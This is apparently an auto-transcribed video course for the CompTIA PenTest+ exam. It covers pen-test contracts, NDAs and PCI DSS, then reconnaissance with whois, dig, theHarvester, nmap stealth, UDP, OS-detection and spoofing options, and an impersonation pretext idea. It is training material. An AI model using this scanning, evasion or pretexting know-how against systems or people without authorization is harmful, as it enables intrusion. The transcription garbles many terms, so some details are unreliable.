contract however it has more details it describes what is supposed to be done in details when it's supposed to start when it's supposed to to end if that's the case um how much it's gonna cost each phase the cost of each phase so let's say that and we're gonna see one example here um so let's say that the in this case the pen tester is supposed to execute five or six different tasks each of those tasks will have a cost associated with it or maybe not a cost but a certain amount of hours that will

be required in order to execute it so basically it's a contract with some more in-depth detailed information now we may also have and that's not a requirement we may also have the MSA master Services agreement in and you may pay attention to this word here Master why is it called Master Services agreement and observe that this is not something specific to pen testing projects but going back to the MSA why is it called Master Services agreement because usually the MSA is a document that describes uh services in general or the specific services but the description

is broader it's not very specific for example usually you're not going to say timeline being described in the MSA so the MSA is basically you can see it as a Services template it's a template document where usually the so is going to make some references to the MSA so for example to make the statement of work simpler or shorter or easier to write and to agree upon it will many many times in many situations reference the MSA document so to give you an example let's say that we have an MSA that describes that when a

pen test is performed um the only a specific part of the network and only a set of devices can be tested can be pen tested well that's a generic statement or a generic uh rule of Engagement because it's valid to any pen test that is supposed to be performed it doesn't matter whether the this pen test is being executed in the year of 2015 or 2020 or 2025 if it's just a um the the the this semester the the pen test that is done in a semester or whether it's the annual pen test it doesn't

matter though those general rules are valid to any pen test obviously if there is any kind of change let's say okay now the company wants to allow another subnet to be pen tested as well okay so if that's once again if that's General if the company wants to include that subnet to be pen tested in any new pen test that occurs then the MSA would be updated if it's and subnet that is supposed to be tested by a specific pen test then that should be mentioned in this statement of work and we also have the

done disclosure agreement or confidentiality agreement usually it's treated as NDA non-disclosure agreement but you may also see confidentiality agreement especially in I.T it's more common to use NDA because we don't want to make any confusion with a certain certificate Authority well the NDA is the document that describes what the uh well basically it says that the pen tester cannot um publish or that make the any type of information public if that person if the pen tester can't make anything public the non-disclosure agreement must specify what can and what cannot be published or made public and

we also have the so these are the main documents more precisely the documents that the CompTIA pentas plus exam is going to demand now the other one is the non-compete agreement personally I didn't see any questions regarding the non-compete agreement however it may be covered in the CompTIA pen Test Plus exam so the non-compete agreement is an agreement that an employee may have to sign required by the employer where the employee employee agrees with um some metrics to avoid competition to avoid the competition of let's say stealing the knowledge that employee acquired while working for

the company that is currently employing this employee so let's say that you work for a company a and that company a wants to make sure that you're not just gonna go to another company based on salary or anything else they want to make sure that whatever is the knowledge that you acquired while working for this company for a certain period of time won't go to that other company so they they may make the employee sign a document that basically says okay Counting from this date and there must be a specific date until this other specific

date which could be a time window of let's say three years five years whatever that is then that employee cannot go to another company that works in the same field in the same area that is directly the same area is directly a competitor so for example we cannot have um if a Google's employee signs a non-compete agreement that non-competed agreement would prevent this this employee from moving from Google to Microsoft's Bing so they're directly competitors and that document prevents that from happening okay so here's an example of a contract um so very simple as you've

probably seen before so we have the description of services then you have the date and there is a description what is going to happen how but you can see here that although I illustrate this document as a contract it's not just a simple contract this is a statement of work that's a soul how can I tell that well basically you can tell that because there is a detailed description here there is a timeline that's when it starts that that's when it's supposed to and these are the tasks to be executed that's how much each task

is going to cost and it will require this amount of hours to be done in this case this is not a just a short-term contract it's a long-term contract but it's still a statement of work now in this case I can assure because this is my contract I signed it so uh for this company for this client we didn't have a separate contract and a separate statement of work and that is very common to see companies that they only do one document just one so there are other companies that they do a contract a generic

contract and a a soul and here is for the same company we have the non-disclosure agreement here so you can see user agreement for non-disclosure or use of proprietary and confidential information so this user agreement for a non-disclosure or use of proprietary and confidential information agreement is entered into and is effective as of then we have the date and the the parts involved um and basically it says that the the person that is being hired which is the freelancer in this case cannot disclosure information that is acquired from their infrastructure or from their systems basically

that's what we see here so we just saw two examples one was a statement of fork the other one is was a non-disclosure agreement now pen testers must have some legal concerns and the first question that must be answered and that's just a a question that you have to ask yourself as a pen tester where are you all and when I say you owe I mean the pen tester and the client or maybe even the you have to consider that the client may be in not only one single country or in one single state so

you can have a situation where you as a pen tester is located in Australia the clients headquarter is in New York and that company has branches all over the US in different states and we may remember that the United States the states of the United States are independent they have their own laws which means that in that case if the pen test project involves the branches involves the whole infrastructure then it's going to be very complex project because the pen tester will have to know their laws and regulations involved and required implemented by all those

States plus the pen testers country Australia so you have to get to know the local and remote laws and regulations where are you where is the client and the contract must also specify the jurisdiction which means if something bad happens if something goes not accordingly to what was specified in the contract then we may have a lawsuit for example okay and to settle that problem what is the jurisdiction usually it's the client's location but again it may get complex you may have did maybe the the client has a headquarter but the the pen tester was

hired to pen test not the headquarters not the headquarter but some branches so one branch is let's say in Illinois another branch is in Florida okay what's gonna happen in this case well usually it's common to um to have separate contracts because we have different laws for those States so it's very very important for the pen tester to be aware of the regulations of the locations involved in that project or projects we also um in the previous video we mentioned the types of assessment and one of those types at least the three most important types

and the three types that are required by the CompTIA pentas plus exam which are the objectives or goals based assessment we also discussed the red team assessment and compliance compliance based assessment that's an assessment that is supposed to be done to make sure that the company the client follows some requirements according to a specific Institution so for example um I mentioned in the previous video that if it's a company that deals with uh healthcare for example a health insurance company they must be HIPAA compliant so they must follow a set of rules or requirements defined

by HIPAA another one that is very common to most companies is the PCI and it's spelled wrong here it's not p i c it's PCI PCI DSS so the PCI DSS standardized or defined some patterns that are supposed to follow for companies that perform credit card transactions so that transaction is that transaction since it's happening online uh what kind of encryption it's supposed to follow or at least what's the encryption standard that is supposed to follow yeah how is that information the client's information going to be stored where is it going to be stored if

a client becomes is not a client anymore what is supposed to be done with that client's information it's supposed to be destroyed how is it supposed to be destroyed if there is a database that is now going to be migrated to another location what's supposed to be done with the former location or the former storage location so all those um definitions are set by PCI so any company that that makes the credit card transaction must follow the PCI DSS standard and here's a link to um a document that actually defines how penetration testing must be

performed when testing this kind of infrastructures so actually locations that do credit card transactions they are uh they are obliged they have to perform pen testing with a certain uh regularity there is a a frequency that they have to do with there is some tests the pen tests that are support supposed to be done and this is a guidance that will tell you as a pen tester what is supposed to be done in order to make sure that company is PCI compliant so for example some stuff that are defined there password policies data isolation as

I previously mentioned and Key Management these are just some of the criterias that are supposed to be defined in a a company that perform credit card transactions and also that is supposed to be tested by the by the pen tester when testing these type of companies to make sure that client is compliance is PCI compliant so we discussed here the legalities the um the legal aspects for pen testers what a pen tester is supposed to pay attention to before during and after a pen test project so we saw that it's very important to know how

to execute a pen test specifically when you're executing a pin test that that is focused in compliance based assessment and we also saw some documents agreement documents that are very important especially when taking the CompTIA pen Test Plus exam so I hope you enjoyed this class hello welcome to our third module in the CompTIA pen Test Plus exam and in this module we're going to discuss information gathering and the numeration at least we're going to start discussing enumeration and the concepts involved in these two um we can say that these are two different steps however

they seem a lot like each other because one actually completes the other we can say that one is more generic whereas the other one is more technical so information gathering is a more of a generic step whereas um enumeration is a more technical step or at least you use more resources to try to find some more specific data some more specific information okay so first of all we have to understand passive information gathering actually we have two different types of information gathering we have passive and active now what is actually passive information gathering passive information

gathering is is also called open source intelligence information gathering or assent and what does that mean the idea of Open Source here is not the same idea of open open source as in software development it's a different definition open source here stands for the idea of gathering information that is open information that is not enclosed within that company's infrastructure so for example if you can gather information in from Google for example from a Google search that is actually passive information gathering that that's that type of information is being gathered using open resources not specifically open

source but open resources because that information is publicly available so that's where the idea of open comes from so the idea of Performing passive information gathering is to avoid direct contact with the organizations infrastructure now why is that so important you have to keep in mind that when you're performing active information gathering and in many situations enumeration there is a very high probability that the ads that you're performing the activity that you're executing can be detected by that Target by that Target company for example or by that Target person and you want to avoid that

you don't want to maintain direct contact because you want to avoid being detected you don't want your target to know that you are targeting that Target obviously so where can you gather that type of information from well public sources for example such as as I mentioned Google being any type of search engine there are some cyber security search engines search engines that are focused on cyber security and flaws you can gather information from social media there are so different types of locations where you can gather that information that type of information from and we're going

to discuss that another type of resource that you can use in order to gather information passively is dunson's some search on public computer emergency response teams now first we have to understand also because the exam demands you to to know that concept so first you have to understand what a cert is a computer emergency response team is so imagine a situation um where you are the cyber security analyst or cyber security engineer of a company and although you deploy with your team you deploy all different types of cyber security resources in order to avoid your

system from being hacked even with that it happens it could happen so let's assume that your infrastructure has been compromised what are you going to do now now each ideally each company should have a cert should have a computer Emergency Response Team what is that all about the idea of a cert is to once um is a system or an infrastructure is compromised that must be detected once it's detected what are we going to do so this 13 is responsible for doing a bunch of stuff but uh mainly on documented documenting what just happened so

a certain is a team that is responsible for writing procedures to Define okay in case this happens what are we going to do so these are the steps well if it's a new situation and we don't have any procedure to treat that specific situation we're going to analyze what happened and then we're going to document what happened so we can gather people together and say hey so next time that this happens if it does this is what we're going to do because this is what we're going to do now okay so that's what a cert

is now there are some public cert teams what does that mean that means that there are some public data about situations that actually happened and how to respond to those occurrences the thing is there are some certs that they actually make available information about companies so that is another type of resource that you can you can use now what kind of what kind of information can you gather from a passive information gathering domain public IP range so even just doing a Google search it's possible to figure out what is the IPS that a company is

using there's also another resource which is who is that will check for a domain and it can actually tell you the IP addresses that company uses at least the public ones email accounts as you know physical location and that is very important a lot of people take it for granted but knowing the physical location and also the physical environment of a Target is very important gather information about staff metadata first of all you have to understand what a metadata is but it's not difficult to understand basically a file has data now you also have you

also have information of a file data of a data that is the metadata for example let's say that you created a file seven days ago and you created that file using your personal computer so if you look at the metadata of that file it's gonna tell it's gonna say the creation date the date it's been modified for the last time um who created that file um what computer was used to create that file so there is a bunch of information that can that that is available about data now what about the active information gathering or

active reconnaissance or simply reconnaissance so reconnaissance is a step where you're still trying to gather information but if it's active you're actually deploying some tools that will maintain direct contact with that Target's infrastructure or the tire targets information but this information is hosted by that client in such a way that the client oh not the client but the the target can actually know that you are performing that type of reconnaissance so for example hosts similarly to the passive information gathering phase where you can also gather information about hosts this type of information here is being

gathered from the the targets infrastructure so you're actually connecting to their infrastructure to see what are the hosts that I have available that we have available within their infrastructure and it can be desktops it can be laptops it can be servers it can be devices such as routers switches hot spots Wi-Fi hotspots what are the services that are running what are the versions of those services what are the parts that are open which usually is associated with services but usually not necessarily back in the day you could establish a relation between service and Port so

if a specific port is open that means there's a that specific correlated service and vice versa that's not necessarily true nowadays you can have Services running in different ports you actually have services that they that they use random ports operating system what are the operating systems running in those devices and also the topology now how can all of this be done there are different tools that will help you to do this so let me let me just give you and we're gonna take a look at some of those tools but let me just give you

an example a very famous and common tool nmap nmap is basically capable of Performing identifying all these information that we can see here Services version Services versions software version open ports operating system and actually building the topology for you zen zen map is a tool that will help you a lot to do that so but what is the difference here the difference is that nmap for example is actually going to directly connect to let's say the router the Gateway the company is Gateway in order to uh gather all that information and then you have enumeration

now how does an emerge enumeration defer from information gathering well actually enumeration is also part of information gathering but it's different from reconnaissance reconnaissance is a phase that we're just trying to recognize the resources um available to that company now in the enumeration phase you are actually trying to find some more specific information such as user accounts group accounts available in their system well because if you're trying to for example if you are willing to Brute Force uh in a system if you're trying to use a if you will try to use a software that

will use user and password in order to for example establish a SSH connection well if you already have the user accounts the valid user accounts in their systems that's going to help you a lot because now your tool will only have to guess the password but not the user same thing for groups same thing for email accounts yes that's true you can gather some email accounts for example from the company's website but you can gather even more information more email accounts if you can extract that information from their system so here we're looking into more

specific detailed information same thing for social data so let's say that a company they have their own Facebook profile okay but that Facebook profile is the company's Facebook profile and you again you can also gather some information about the CEO about the president that kind of stuff but from social media you can also gather information about the staff okay who is the director assistant that type of information maybe is not available um in their website but you can if you can find that person's name then you can probably gather some information from that person's social

media or social medias and also fingerprinting now again fingerprinting can be performed during the reconnaissance phase but if it's a more specific fingerprint then it's doing it's done during the enumeration phase Let me Give an example going back to using and map if you're using nmap to let's say figure out the ports that are open okay that's doing the reconnaissance phase but if you're trying to figure out some more detailed information about that router for example what's the operating system that is running um what what kind of firmware that is running what are the software

versions these type of space and what is the MAC address of that specific node so so when you gather some specific information a specific device information that's called fingerprinting and fingerprinting is done doing the enumeration phase so it's similar to having some of these different data such as versions ports operating systems but putting them putting them together then you're having the fingerprint because you can have different devices with the same ports in the same Services running but they're not going to have the at least ideally you won't have different devices with the same ports same

services and same Mac address for example from the same vendor so that combination of information will give you a fingerprint will uniquely identify that device so understanding the difference between enumeration reconnaissance or active information gathering and passive information gathering is very important why because this is going to actually be the very first step that are going to execute before targeting or actually deploying an attack before you deploy an attack you have to gather as much information as you can because this is going to filter this is going to filter your options this will actually give

you the options that you have like I mentioned if you have user accounts then you can filter the types of attacks that you're going to run you can actually reduce the attack attempt for example in a Brute Force attack if you know the services you can avoid hey I have this let's say that I have this list of tools that I can use in order to perform an attack but hey if I don't have uh the information that I need in order to spam send emails because I don't have enough female accounts I'm not going

to do this so that's why it's very important to perform these uh steps so I hope you like this and I'll see you in our next video and our next video is going to be the video that where we will see different Tools in order to perform tools or resources in order to perform passive information gathering active information gathering and enumeration thank you very much hello welcome to our second video in module 3 and our Focus just to remind you our focus in this module is to learn some to learn how to perform information gathering

both passive and active information gathering as well as enumeration it's difficult to perform each of these tasks separately most of the times they walk together they hold hands because it's a continuation you're not actually going to differentiate whether you're performing passive information gathering active information gathering or enumeration basically what you want to do is to gather information now you have to know the techniques the proper techniques that you should use in order to achieve that goal so we discussed in our previous video we discussed the meaning of each of these techniques what you're actually doing

here we're going to actually see some resources that we have available in order to achieve this goal so first of all we want to take a look at the Edgar website so and this is the URL sac.gov Edgar slash search editor slash company search now what is Edgar Edgar is a project from the U.S security is an Exchange Commission that we will allow you to search for information about people and mostly companies as you can see over here so you can either search for someone's name or a company's name most of the times you're gonna

be looking for a company's name now what kind of information can you find here mostly financial information although not only that but mostly financial information and you may tend to think why would I want to gather some financial information well because that can give you an idea of um how well that company is doing what types of clients they're dealing with um how big that company is this kind of stuff so as you already know all types of information that you can you can gather will help you so let me give an example if you

take a look at the financials of a company and obviously this is not a detailed financial description but at least it can give you an idea of for example how big that company is well if you find if your target is a company that is very large there is a very high probability that their staff is also large they have many employees which means that performing some social engineering may be easier and why would that be e well because you can try for example to call the company saying hey I'm John from it well since

the company has so many employees that person that you are calling may not know John and that person may think okay I don't know John from I.T but that's because we have so many employees and I can't remember I don't know everybody whereas in a small company that the chances of doing that reduces a lot okay so let's take a look at how Edgar Works actually it's pretty simple as all of the tools that we have here are simple as well so let's just pick a company name and let's say Netflix okay when you type

a company name it will search on the Fly for all companies that have that string okay so probably this one Netflix Inc let me click there and let's see what we have oh okay so we have here Netflix Inc right what this company does so it's a Services videotape rental company uh it's located in California and that's the company name you have the business address so just by looking at this here you already you can already gather some information now we have to remember that we have the white box methodology the gray box methodology in

the Black Box methodology if your client is a uh it is allowing you to have access to a bunch of information so if the methodology here or the pen test that has been performed is a white box obviously you don't need Edgar now if it's a black box you have almost no information about that company so just by doing this type of search here you can already gather some information and down here you have a bunch of documents that were filed by that company to Edgar to the U.S Securities and Exchange Commission so you can't

go through some of these documents and they will help you get an idea of about that company it will give you more information okay another very very resourceful very useful website and this is just one of those websites but what matters is the protocol and this protocol is called who is and this is just one example of a who is website there are so many and it may vary according to the country as well so for example in the United States you have several websites that perform who is but if you're in let's say Australia

probably there is another company that is or a government institution that takes care of who is the who is protocol now who what is who is who is search domain name website nip IP tools what does it actually do and you can see it right here see website information so once again let's search for the same company netflix.com okay let's do it a little bit different this time let's search for microsoft.com and I'll perform the search here okay so here we see microsoft.com we have some register info which usually is not that helpful but if

we scroll down then we can gather some more information here um so name servers these are the domain name servers that are responsible for that domain microsoft.com so they have four domain name servers and here we this is what is actually even more important although this is important as well because from here you can know how many DNS servers that domain has and what their domain servers are but down here down below here is where you have the most important information okay now I know um the company's name I know where the where it's located

I have the phone number I have an email that I can try to contact or I can even use this account here to perform this is an example of enumeration right now you have some specific information about that domain now this is the red strength contact information what about the administrative contact information in this case they are all the same but there are situations where you have different people or different companies for example the someone is responsible to admin the domain registration the domain name registration up here red strength contact information but the company has

a separate Administration and also regarding technical issues this is the person that should be contacted let's say a website is offline okay so I should have the contact of the technical person responsible for that so again you're just gathering information and filtering um the type of information information that is actually going to be helpful for you okay now observe that here we were also able to gather some technical information right so these are the domain name servers and these are their their IP addresses from here I can even start performing some active information gathering or

reconnaissance we're not going to do this now but this in this is an important information that we may use in the future during the reconnaissance phase and even during enumeration now since we're still in the passive information information gathering phase we have to remember that the passive information gathering phase is done by executing techniques and resources that will not directly connect the that domain servers machines active devices so if I try for example to actively scan this IP address I will be moving to the reconnaissance phase that's not what I want to do so far

so far the only thing that I want to do is you still work on the passive information gathering but there are some tools that I can use according to this information that I have here for example we can we have some some tools here such as host let's say host www.microsoft.com and we we could do this on this IP here as well or this name here but let's just take a look at microsoft.com the the web server now what can I see when I use the host command okay I can see that the machine called

www in that resides in the microsoft.com domain is actually an alias for another machine that is in the edgekey.net domain now it's a subdomain Microsoft is a subdomain residing within that other infrastructure there and actually this Edge domain www.microsoft.com c-3.edgekey.net is an edius for another machine so now here I can follow their structure of names to the end to the very end where I can see that machine actually has the Sip address here oh and this is also another very important information that server actually has IPv6 address as well something that we'll talk about later

on now another still working on domain names another command that I have available and actually we have many but another one is Big so for example the same result that I could gather here I search for microsoft.com and it showed me okay these are their domain name servers I can actually use dig whenever I want to work with domain names so here I'm using Google's domain name server at least one of those so I use the at to specify the domain name server that you want to use to consult to talk to and I want

to ask Google's domain name server about this other domain here microsoft.com and what I want to ask is what is or what are the DNS servers of this domain right here and I performed this search and we can actually see it that this information here match with this information right here it's just another DNS search now something very interesting about dig is that you can perform any type of search when it's related to domain names for example instead of using NS I can use MX which stands for Mayo exchange and when I do that I

am actually going to see that these domains Mayo exchange or SMTP server is this one right here Microsoft dashcon.mail.protection.outlook.com I can see generic information about this domain which is going to be very similar to performing a who is there it is so there are several tools that are very helpful now I saw here right here for example that microsoft.com has this IP address right here at least the web server 105 104.115.148.63 and let's say that I want to know where this is there are ways of searching for a geographical location but this is not the

moment especially because um when we used Edgar for example or even the who is I I was told that this company is in Redmond okay now I I don't want to know the geographical location but I want to know the digital path to where this website resides for that I have the trace route command so here I can see that from my machine to the location of that destination this is where I'm going through right and in many situations you may have some um you may you may have some uh asterisks as you can see

here that means that it's taking too long it could time out that was not the case here but if it works you're gonna see step by step from your machine to that destination what are the servers or routers that are being used to establish that path now most important thing here is to realize it's not actually the initial steps leaving from my machine to the destination but the last steps based on the last steps I will be able to tell together more information about their infrastructure such as what is the ISP they're using and once

it enters their domain their infrastructure domain how many steps do I have to go through until I reach that server but what is important here is msn.net starting from here I can see that I enter the Microsoft network which is a very very complex infrastructure so if this was my Target from here I would know hey okay I'm gonna have a lot of work to do but at least I also have many resources because I have many devices it's a complex infrastructure it gives you more options let me hit Ctrl C here now we've seen

some tools that are very useful when performing passive information gathering and another very helpful tool that we have available is the Harvester now you can see here that I have running I have my Kali Linux instance running here it's very important that you have a Linux operating system running while doing this course while training for the CompTIA pen Test Plus exam and I would advise you to use Kelly Linux if you want to use let's say slackware if you want to use Debian if you want to use Centos that's perfectly fine the problem is you're

going to have some additional steps while installing those tools Calvin Linux is a Linux operating system that already brings you many pen testing tools okay so regarding the Harvester the Harvester is a tool that will help you search for information on different types of sources for example if I want to search for um information about people that work at LinkedIn or that did some courses using LinkedIn any type of association with LinkedIn for example I want to try to get information of people that work at Netflix well if people that work at Netflix professionally speaking

they should have a profile in LinkedIn so what could I do I could perform that type of search but first let's take a look at the Harvesters help observe here that you have a bunch of information so this is how the syntax score goes okay and we first have an introduction here table results already exists that's because I already performed a search but okay some information about the Harvester here then I have a bunch of options and what we want to take a look at here is let's say right here I use Dash D to

specify the domain name that I want to search for well if you want to it doesn't have to be a domain name it can be it can just be a string let's say Netflix without.com and I want to perform that search in this database here this company's database LinkedIn these are the databases where I can perform that search you even have all here that will actually run that search in all these databases right here obviously it's going to take a very long time so if I perform this type of search here what is it going

to do it will search for people in LinkedIn that are at some point associated with Netflix they mention Netflix in their profile at some point so that's how you can use the Harvester also a very resourceful tool also a tool that you should use to perform passive reconnaissance so I hope you enjoyed this video please go back and take a look at those websites the resources that I have available in order to perform passive information gathering see you in our next video thank you Welcome to our third video of module 3 where we're studying passive

and active information gathering now the focus of this video is going to see some additional tools that we can use in order to perform active information gathering or reconnaissance now keep in mind that these tools they're supposed to directly contact the um the the infrastructure used by that specific Target this means that there are some steps here that can be detected although there are some techniques and we're going to discuss that throughout the course there are some techniques where you can that you can use in order to avoid that detection but keep in mind that

there is a possibility that you get detected during this phase so you have to try to avoid that you don't want to be detected okay now what is the first tool that we have to take a look at and this is a very famous tool if you've ever watched any film any movie that um has at some point is involved with I.T specifically cyber security there is a very high probability that you saw this tool in that movie if you saw a hacker in a movie there's a very high probability that the tool that was

being displayed there was this tool called Network mapper or animap now what does this tool do let's take a look here at the most important options Okay so nmap that's the version that I'm using here oh by the way once again you have to have a Linux instance running I advise you to use Kali Linux and nmat nmap can comes natively in any Kali Linux distribution okay so usage nmap and then this can type this tells you a lot that so that's what this tool does or at least that's what this tool was designed for

this tool was designed to perform Network mapping specifically host scanning Port scanning and network scanning what does that mean that means that this tool was designed to allow you to say whether a host is alive and if it's alive what is what are the ports that are running and you can also perform these tasks these analysis against entire networks actually entire different networks it doesn't have to be a specific host a specific IP address so as you can see here you can pass host names IP addresses networks Etc so some examples here a domain name

a domain name with a cidr notation one is specific IP address or a range of IP addresses just to name a few examples now I mentioned that initially these two was designed with this goal but it changed it evolved a lot during a period of time throughout the years so for example you can do steps such as trace route you can use in map to trace route the path between you the source and that destination and you can just keep enhancing and enhancing and enhancing these reconnaissance to a phase where you can run Scripts so

nmap allows you to run a script invoke a script and that script can do a bunch of stuff well it's up to you you are developing that script okay there are some scripts that are available so you can just tell and map hey on the map I have this script here it's been written in Lua so you can use this script this is a very powerful but at the same time very dangerous resource why because you can use nmap not only to run scans but also to check for vulnerabilities and the problem about checking for

vulnerabilities is that there are some vulnerability analysis that will actually execute an attack and if that Target is susceptible to that attack well it's gonna work so you mean you may even crash that Target so you have to be very very very careful in that sense now a very important information here the CompTIA pentas plus exam demands you to know a bunch of options that you have available in any map obviously it doesn't require you to know all of them but at least the most important ones and we're gonna talk about these ones over here

okay now before we actually start let's just take a look at the very simplistic usage of nmap oops nmap and this is my router's IP address okay let me run that so I can see that my host is up and it has all these ports here either open or filtered so part 22 that's SSH but there is one limitation here when we run this type of scan well actually there is a bunch of limitations but just one limitation that we can identify here it's associating the part number with a service okay that is because the

Linux system has a file which is the slash Etc slash Services file and what this file does it's basically a file a text file that is used as a database associating port number with service but you may have you may very very well have part 22 running HTTP for example that's not a standard but you can't do it there are ways of using nmap to identify that so make sure you don't associate the part number with the service don't rely on this type of information because it could be wrong okay so part 22 is filtered

it's open but it's filtered that means that that host in this case my fire or my Gateway is filtering that part it's limiting the type of access to Port 22. part 80 on the other hand is fully open well obviously if this web server here is performing authentication that's another thing but that that's a application limitation in an application resource and here we're analyzing either layer 3 Network internet or layer 4. I also have Port 139 which is filtered this part here which is open and this other Port which is filtered so this is a

very simple scan that you can run using nmap okay now obviously we want to enhance that and that's why we're going to take a look at some of the important um options or switches that we have available within map okay so Dash I lowercase i uppercase L input file name in case you're you have so many hosts or networks or in networks that you want to to scan it maybe you probably don't want to list that in the command line you want to put those addresses names Network addresses in a file well because if you

want to run it again or if you want to add more information more data you can just add it to that file you don't want to retype in the console Dash lowercase i uppercase R and the number of hosts this number of hosts so nmap we randomly pick IP addresses um and listing that that picking that specific number of hosts okay now host discovery and you have different switches here for example if you just want to say whether the the host is available or not you can disable part scan you can simply run a ping

scan foreign s here continue but we're gonna go down to the most important ones and this is one of the important sections that you have and you can observe by the way you can observe that dnmap help tool help page is divided in sections Okay so options switches that you can use in order to specify Target how to define the discovery now these scan techniques go here dash s s Dash S capital T dash s a dash s w dash s m and here you have their explanation TCP scene that's Dash lowercase s uppercase capital

s this is the stealth s stands for the second is capital S it stands for um the the the the the the the stealth mode so whenever you're using the dash lowercase s you're defining a scan technique and now the technique the specific technique comes as a capital letter after the lowercase s okay so capital S stands for stealth mode t and and then you have all the other options T stands for connect a ack and then you have the other options now among these options here what is important and this is actually default the

lowercase s uppercase s that's the stealth mode this is a type of Point scan where you're trying to avoid the detection you're trying to avoid that system to realize hey there's a parts scan happening over here another very important switch is the capital u UDP scan that's because by default nmap does not scan UDP ports only TCP ports so dash s Dash capital u will also run a capital A UDP scan we also have the scans that will work on the TCP flags that we have for example if you want to perform a Christmas scan

if you want to perform a thin scan or a TCP you know these are the options so just to give you an idea in case you don't remember the TCP Flags if we run a dash lowercase ALS S capital F scan we're running a fin what does that do that TCP segment that is being sent to the destination who have thin enabled well what does that do it can uh you you're gonna get a response only if there is a uh only if that part is actually open now the difference is that destination host will

say hey I'm receiving a fin to my port let's say part 80. if that part is closed it's not going to do anything but if that part is open it's actually going to say hey part 80 is open but we're trying to finalize a connection but there is no connection available so it's just another different way of realizing detecting whether that port is open or not but making it harder for that destination that Target to detect that part scan that you're running right there continue let's take a look at some other options that we have

available now we're going to move on to part specification and scan order now in case you don't want to um is can the default ports that that will range from one to approximately approximately 55 000 ports you can specify specify hey this is the part that I want to scan or these are the ports that I want to scan for example I can run Dash P22 okay I only want to scan Port 22 or you can specify a range hey I want to scan Port from Port 1 to 65535 and you can actually specify according

to the transport protocol so let's remember if we don't specify uh if we don't use the dash s U capital u option it will not scan for UDP ports but let's say that you want to specify a range of boards but there is different different Port types for example ports 53 111 137 are UDP ports now 21 through 2580 139 8080 are TCP Port so you can do that kind of combination you can also specify the dash capital F auction which runs the scan in a fast mode so it scan fewer ports than the default

is scanned so it will only scan from 1 to 1024. foreign option here now we go to service or versioning detection s lowercase S capital V problem open ports to determine service version info so this is the option that you can use in order to avoid this problem right here so remember when we talked about hey there is a chance that for example Port 22 is open but it's not running as the SSH service it's running any other service okay if you want to actually ask nmap to try to identify hey and map if you

see Port open please try to actually identify the actual service so that's this option right here not only the service but of also the software version so let's say that there is a port 80 is open okay that probably that means that's it's a web server but is it really if it is it's gonna tell you hey this is a web server and also as far as I can detect the web server that is running here is let's say Apache whatever version that is now moving forward script scan and this is where I mentioned that

you can actually ask nmap to run scripts with the dash dash script option and you can then identify the script that you wanted to use in order to perform that scan so it's not only going to run a part scan but it's also going to execute that script now what does that script does well it depends there are different scripts that you have available and you can create your own just remember that you have to create those scripts in the Lua language and does that script require arguments if it does then you can use Dash

that script Dash args and then the arguments here separated by comma another very important option that you have to know is the dash capital O enable OS detection there are some situations that you're not actually very concerned about the parts that are open you just want to perform a fingerprint so you can use the dash Capital option it's going to tell you hey this device is up and the operating system that is running here is a Windows 10 for example now it doesn't mean that it's going to be precise it's going to be accurate but

it will try to do such timing and performance one other important option that you have is the dash T option with a number that ranges from 0 to 5 set timing template higher is faster so this is how fast this scan is gonna run okay and you have some other options here that you should look at those but Dash T4 for example is one option that you should know when you take the CompTIA pen Test Plus exam now also very important options here and let me go back here firewall IDs evasion and we're going to

discuss that evasion and spoofing we're going to discuss that in other modules that are to come but these are all so that means that we're going to use nmap in the future again actually you're going to use and map several different times but these are options that will help you perform Parts scan or even running scripts at the same time evading detection and Performing spoofing okay so for example if you want to spoof The Source address you can use the dash Capital as option with that IP address if you want to spoof your Mac address

then you can use dash dash spoof Dash Mac and then the MAC address now regarding the output there are different ways of displaying the results so for example this is the default right here but you have different ways of displaying that for example if you want you can display in XML and even HTML several different formats now other another very important option is Dash lowercase V it will increase the verbosity the information the debugging that you will see so as you can see you just increase the number of V's to get more information similarly to

Dash D increase the number of these and continuing okay now some miscellaneous options here very important options if you have if you want to scan a IPv6 IP you have to use the dash six option now another very resourceful option is the dash capital A it does a bunch of stuff at the same time so it enables OS detection which is the dash Capital all option version detection which is the dash lowercase S capital V it runs script scanning and it runs trace route all at the same time and here you have some examples so

let's just run maybe two or three other examples here okay so let me clear this screen here and let's run it now obviously it may take a while because it depends on the number of ports and especially if you're running more options to get more details such as Dash capital O to fingerprint and dash lowercase as capital V to get the versions then there is more debugging to be performed here okay so Port 22 it could not identify the version but it could identify the service it is SSH indeed part 80 it's running a micro

HTTP web server which I've never heard of but that's what we have there um Port four five four Thirty one that's TCP it's open the Service UPnP and that is the um the the the version of the software that is running now since I'm fingerprinting I'm not only getting the operating system as we can see here but I can gather some other additional information such as the MAC address it's running a Linux either version kernel three or four and it's a OS CPU what a CPE what does that tell me that tells me that this

is indeed a modem because that's what a CPE is and how far it is oh that's just one hop away okay now what if I perform D Dash a option but I also want to use dash s oops U okay so let's take a look at the the result that we're gonna get there now once again a lot of information to be gathered here many details so it may take a while and we could simply um use specify some ports so we're gonna do that next in the meantime let me open another terminal here and

let's take a look at another option so here I'm running the I'm using the dash p with 53 because I only want to scan Port 23 53 and this is a UDP port so and this is uh Google's DNS server one of their DNS servers okay so the host is up and that part part is open we could see how fast this was what if I run this same scan without this option right here oh okay so two different situations here before I could see that 53 UDP is open now I can see 53 TCP

is open so you can see the difference here if I don't specify as you then I will run that type of port scan but it's going to only look for a TCP Port not UDP okay and here I could see okay in this case I have the same part number 53 open both using TCP and using UDP which is not uncommon especially when when we talk about the DNS protocol the domain service protocol that's because usually it uses UDP just to resolve names and TCP to perform Zone transfers okay so these are some options that

we were looking at whereas that scan still runs it's still running that scan it takes a very long time especially because I'm using the dash Su option right here now continuing while this is still running we're gonna move forward and take a look at another tool another very important tool that we have available it's very it can be very resourceful resourceful is telnet you can even use ncat as well so ncat gives you more power but we're gonna use ncat in another netcat in another situation which is the NC Command right now let's just take

a look at the telnet command so telnet was initially used to Simply perform a remote connection that was many many years ago where you wouldn't use encryption nowadays you have SSH actually not even SSH just new but nowadays you don't use telnet to perform remote access anymore you use SSH because it allows you to perform remote access using encryption okay now why do we have to understand telnet know how to use telnet nowadays because it's a debugging tool it ended up becoming a debugging tool debugging how okay let's say that I want to see where

the report is open and well you could use nmap to do that that's true but also what if I want to not only see if that part is open but also whether I can establish a connection or not even more if you can establish a connection if you can speak that protocol language each protocol has its own language if you can't speak that protocol language then you can do and perform an entire connection and conversation using telnet okay let's take a look at an example so let me tell that my modem in Port 80 because

